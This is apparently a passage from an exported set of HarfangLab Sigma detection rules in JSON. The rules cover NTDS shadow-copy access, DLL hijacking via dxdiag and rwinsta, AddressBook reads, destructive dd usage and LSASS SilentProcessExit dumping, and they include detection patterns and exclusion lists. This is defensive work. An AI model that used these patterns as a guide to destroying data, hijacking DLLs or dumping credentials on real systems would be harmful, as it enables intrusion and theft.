'?:\\Windows\\System32\\SearchIndexer.exe'\n\n exclusion_datasafe:\n ProcessImage:\n - '?:\\Program Files (x86)\\Data Safe Restore\\plugins\\vss\\vshadow-64.exe'\n - '?:\\Program Files (x86)\\Data Safe Restore\\DSR Client.exe'\n\n exclusion_igfxcui:\n ProcessGrandparentImage: '?:\\Windows\\system32\\igfxCUIService.exe'\n ProcessImage: '?:\\Windows\\System32\\igfxEM.exe'\n\n exclusion_barracuda:\n # C:\\Program Files\\Barracuda\\Barracuda Backup Agent\\win\\x86_64\\BackupService.exe\n # C:\\Program Files\\Barracuda\\Yosemite Server Backup\\win\\x86_64\\ytwinsdr.exe\n ProcessImage:\n - '?:\\Program Files\\Barracuda\\Barracuda Backup Agent\\win\\\\*\\BackupService.exe'\n - '?:\\Program Files\\Barracuda\\Yosemite Server Backup\\win\\\\*\\ytwinsdr.exe'\n\n exclusion_hp:\n ProcessImage: '?:\\Program Files\\HP\\Data Protector Express\\win\\x86_64\\dpwinsdr.exe'\n\n exclusion_runtime_software:\n ProcessImage: '?:\\Program Files (x86)\\Runtime Software\\DriveImage XML\\dixml.exe'\n\n exclusion_bacula:\n ProcessImage: '?:\\Program Files\\Bacula\\bacula-fd.exe'\n\n exclusion_symantec:\n - ProcessImage: '?:\\Program Files\\Symantec\\Backup Exec\\beremote.exe'\n - ProcessParentImage: '?:\\Program Files\\Symantec\\Backup Exec\\beremote.exe'\n\n exclusion_cyberprotect:\n ProcessImage: '?:\\Program Files\\BackupClient\\CyberProtect\\cyber-protect-service.exe'\n\n exclusion_atempo:\n ProcessImage: '?:\\Program Files\\Atempo\\Atempo Lina\\Agent\\bin\\HNAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ATEMPO SAS'\n\n exclusion_duplicati:\n ProcessImage: '?:\\Program Files\\Duplicati 2\\Duplicati.Server.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kenneth Skovhede'\n\n exclusion_arcserve:\n ProcessImage: '?:\\Program Files\\CA\\SharedComponents\\ARCserve Backup\\UniAgent\\caagstart.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Arcserve (USA) LLC'\n - 'CA, Inc.'\n\n exclusion_omniback:\n ProcessImage: '?:\\Program Files\\OmniBack\\bin\\vbda.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Micro Focus Group Limited'\n\n exclusion_semperis_recovery_agent:\n ProcessImage: '?:\\Program Files\\Semperis\\ADFR\\Semperis.ForestRecoveryAgentSvcHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEMPERIS INC.'\n\n exclusion_oxibox:\n ProcessImage: '?:\\Program Files\\Oxibox\\oxibackupd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Oxibox'\n\n exclusion_ibm:\n ProcessImage: '?:\\Program Files\\Tivoli\\TSM\\baclient\\dsmcsvc.exe'\n ProcessSigned: 'true'\n\n exclusion_emc:\n ProcessImage: '?:\\Program Files\\EMC NetWorker\\nsr\\bin\\save.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Dell Technologies Inc.'\n\n exclusion_nable:\n ProcessImage: '?:\\Program Files\\Backup Manager\\BackupFP.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'N-ABLE TECHNOLOGIES LTD'\n\n condition: selection and ((not 1 of exclusion_*) or selection_remote_system)\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a001854-f3b2-4a21-81af-df74ddf642d2",
"rule_name": "NTDS Database Dumped from Volume Shadow Copy",
"rule_description": "Detects accesses to the NTDS.dit file inside a Volume Shadow Copy.\nAttackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\nThis can be indicative of an attempt to dump the Active Directory Database for credential access.\nIt is recommended to investigate the process trying to access the NTDS database for malicious contents.\n",
"rule_creation_date": "2023-06-26",
"rule_modified_date": "2025-12-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a21b7f5-7bb1-4166-a5ae-c791651cf72b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093417Z",
"creation_date": "2026-03-23T11:45:34.093419Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093423Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_dxdiag.yml",
"content": "title: Phantom DLL Hijacking via dxdiag.exe\nid: 8a21b7f5-7bb1-4166-a5ae-c791651cf72b\ndescription: |\n Detects a potential Windows DLL search order hijacking via dxdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\DXGIDebug.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a21b7f5-7bb1-4166-a5ae-c791651cf72b",
"rule_name": "Phantom DLL Hijacking via dxdiag.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via dxdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a269d59-6392-43f4-bd66-134da5a52148",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093390Z",
"creation_date": "2026-03-23T11:45:34.093392Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093397Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_read_addressbook.yml",
"content": "title: Suspicious Read Access to AddressBook Files\nid: 8a269d59-6392-43f4-bd66-134da5a52148\ndescription: |\n Detects a process reading sensitive files related to the AddressBook application.\n Adversaries may collect contacts on local systems to gather Personally Identifiable Information (PII).\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\ndate: 2024/07/03\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.Collection\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/Library/Application Support/AddressBook'\n ProcessImage|contains: '?'\n\n filter_legitimate:\n Image:\n - '/System/Library/*'\n - '/System/Applications/*'\n - '/System/Volumes/Preboot/Cryptexes/App/System/Applications/Safari.app/Contents/MacOS/Safari'\n\n filter_benign_files:\n Path:\n - '/Users/*/Library/Application Support/AddressBook/Configuration.plist'\n - '/Users/*/Library/Application Support/AddressBook/Metadata/.info'\n\n # Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n - '/Library/WithSecure/ultralight/bin/com.withsecure.ultralight.wssensord.xpc/Contents/MacOS/wssensord'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n exclusion_mcafee:\n Image: '/usr/local/McAfee/AntiMalware/VShieldScanner'\n exclusion_norton:\n Image:\n - '/Applications/Norton.app/Contents/Backend/utils/com.norton.mes.endpointsecurity.app/Contents/MacOS/com.norton.mes.endpointsecurity'\n - '/Applications/Norton.app/Contents/Backend/services/com.norton.daemon'\n exclusion_kaspersky:\n Image: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n exclusion_checkpoint:\n Image:\n - '/Applications/Check Point/Agents/cpamdApp.app/Contents/MacOS/cpamdApp'\n - '/Applications/Check Point/Agents/Check Point Endpoint Security.app/Contents/MacOS/Check Point Endpoint Security'\n exclusion_elastic:\n Image: '/Library/Elastic/Endpoint/elastic-endpoint.app/Contents/MacOS/elastic-endpoint'\n\n exclusion_avg:\n Image: '/Applications/AVGAntivirus.app/Contents/Backend/utils/com.avg.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avg.Antivirus.EndpointSecurity'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n exclusion_oxibox:\n Image: '/Library/Oxibox/oxibackupd'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n# end common exclusion\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.*'\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_grep:\n Image:\n - '/usr/bin/grep'\n - '/usr/local/Cellar/ripgrep/*/bin/rg'\n\n exclusion_webex:\n Image: '/Applications/Webex.app/Contents/MacOS/Webex'\n\n exclusion_cursor:\n Image: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper.app/Contents/MacOS/Cursor Helper'\n\n exclusion_acronis:\n Image:\n - '/Applications/Acronis True Image.app/Contents/MacOS/backup_worker'\n - '/Applications/Acronis True Image.app/Contents/MacOS/escyberprotect.app/Contents/MacOS/escyberprotect'\n\n exclusion_azure:\n Image: '/Applications/Azure Data Studio.app/Contents/Frameworks/Azure Data Studio Helper.app/Contents/MacOS/Azure Data Studio Helper'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n exclusion_image:\n Image:\n - '/Applications/OpenCode.app/Contents/MacOS/opencode-cli'\n - '/Applications/Antigravity.app/Contents/Frameworks/Antigravity Helper.app/Contents/MacOS/Antigravity Helper'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a269d59-6392-43f4-bd66-134da5a52148",
"rule_name": "Suspicious Read Access to AddressBook Files",
"rule_description": "Detects a process reading sensitive files related to the AddressBook application.\nAdversaries may collect contacts on local systems to gather Personally Identifiable Information (PII).\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2026-02-25",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a6738af-351d-4d7d-a394-46a598ee9cff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591892Z",
"creation_date": "2026-03-23T11:45:34.591896Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591903Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rwinsta.yml",
"content": "title: DLL Hijacking via rwinsta.exe\nid: 8a6738af-351d-4d7d-a394-46a598ee9cff\ndescription: |\n Detects potential Windows DLL Hijacking via rwinsta.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rwinsta.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a6738af-351d-4d7d-a394-46a598ee9cff",
"rule_name": "DLL Hijacking via rwinsta.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rwinsta.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a840c55-7e14-426d-b112-1bf0653a9284",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095692Z",
"creation_date": "2026-03-23T11:45:34.095694Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095699Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md",
"https://attack.mitre.org/techniques/T1485/",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1485_suspicious_dd_usage_macos.yml",
"content": "title: Suspicious Usage of dd (macOS)\nid: 8a840c55-7e14-426d-b112-1bf0653a9284\ndescription: |\n Detects the usage of the dd command with an input of /dev/zero, /dev/random or /dev/urandom.\n This could be used by an attacker to perform secure deletion of files or data destruction.\n It is recommended to check if the use of dd is expected and if the deleted file was suspicious.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2022/11/09\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1070.004\n - attack.t1485\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Deletion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n Image|endswith: '/dd'\n CommandLine|contains:\n - 'if=/dev/null'\n - 'if=/dev/zero'\n - 'if=/dev/random'\n - 'if=/dev/urandom'\n selection_of:\n CommandLine|contains: 'of='\n condition: selection_base and selection_of\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a840c55-7e14-426d-b112-1bf0653a9284",
"rule_name": "Suspicious Usage of dd (macOS)",
"rule_description": "Detects the usage of the dd command with an input of /dev/zero, /dev/random or /dev/urandom.\nThis could be used by an attacker to perform secure deletion of files or data destruction.\nIt is recommended to check if the use of dd is expected and if the deleted file was suspicious.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-01-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ace4105-3417-4cb1-8609-43feab3aecf3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078420Z",
"creation_date": "2026-03-23T11:45:34.078422Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078426Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/",
"https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_silent_process_dump_lsass.yml",
"content": "title: LSASS.exe SilentProcessExit Monitor Registered\nid: 8ace4105-3417-4cb1-8609-43feab3aecf3\ndescription: |\n Detects a registration of a SilentProcessExit for LSASS.exe used to dump a process' memory.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the process making the registry modification for other suspicious actions.\nreferences:\n - https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/\n - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/03/02\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.t1003.001\n - attack.t1112\n - attack.t1078\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe'\n\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe'\n\n filter_empty:\n Details: '(Empty)'\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ace4105-3417-4cb1-8609-43feab3aecf3",
"rule_name": "LSASS.exe SilentProcessExit Monitor Registered",
"rule_description": "Detects a registration of a SilentProcessExit for LSASS.exe used to dump a process' memory.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the process making the registry modification for other suspicious actions.\n",
"rule_creation_date": "2021-03-02",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ad5b489-e501-424e-b275-b55b2e88f3f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083746Z",
"creation_date": "2026-03-23T11:45:34.083748Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083752Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/software/S0552/"
],
"name": "t1482_domain_trust_discovery_find.yml",
